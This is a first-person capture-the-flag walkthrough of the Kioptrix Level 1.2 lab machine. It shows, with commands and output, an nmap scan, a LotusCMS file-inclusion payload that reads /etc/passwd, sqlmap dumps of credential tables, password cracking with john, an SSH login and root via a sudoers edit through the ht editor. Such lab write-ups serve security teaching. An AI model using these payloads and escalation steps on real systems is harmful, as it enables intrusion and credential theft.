This is a walkthough of how I completed the Kioptrix Level 1.2. The goal of this challenge is to collect the flag.
[email protected]:~# nmap -n -sV -A -p- kioptrix3.com PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: Ligoat Security - Got Goat? Security ...
This little website is powered by LotusCMS, which is vulnerable to remote code execution. However, I wasn’t having much luck with anything other than the exploit in the Metasploit Framework. Since I don’t like to rely on this, I pressed on to find another route in.
LotusCMS also has an LFI vulnerability, which I used to enumerate a list of users on the system (via
http://kioptrix3.com/index.php?system=../../../../../etc/passwd%00.html loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
I actually decided to hold off on bruteforcing their SSH logins. It was my assumption that at this level of challenge, the password would be too complex to bruteforce in a reasonable amount of time.
One of the blog posts referes to a new gallery application at kioptrix3.com/gallery.
A review of the page’s source code, reveals an HTML comment which shows the location of the admin login page - /gallery/gadmin. This login page tells us that the application is called Gallarrific, which is vulnerable to SQLi in gallery.php.
I plugged the URL into SQLMap and it confirmed the vulnerability.
[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null --current-user --is-dba --current-db web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5.0 current user: [email protected]' current database: 'gallery' current user is DBA: True [email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery --tables +----------------------+ | dev_accounts | | gallarific_comments | | gallarific_galleries | | gallarific_photos | | gallarific_settings | | gallarific_stats | | gallarific_users | +----------------------+ [email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --dump
I saved these hashes and cracked them with john.
[email protected]:~# john /tmp/sqlmaphashes-eOPcIU.txt --format=raw-md5 starwars (loneferret) Mast3r (dreg)
I also dumped the password for the admin account on gallarific.
[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump admin:n0t7t1k4
My original intent was to use the admin password for Gallarific and attempt to upload a PHP backdoor. However, I first decided to try the two passwords from the dev_accounts with SSH.
I was able to login as
loneferret with the password
starwars (blew my original SSH theory out of the water).
Within loneferret’s home directory was a file called
[email protected]:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'.
I confirmed that loneferret had the rights to run ht with sudo.
[email protected]:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht
The obvious solution is to modify the sudoers file, to give loneferret sudo right to
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
[email protected]:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht (root) NOPASSWD: /bin/bash [email protected]:~$ sudo /bin/bash [email protected]:~# id uid=0(root) gid=0(root) groups=0(root)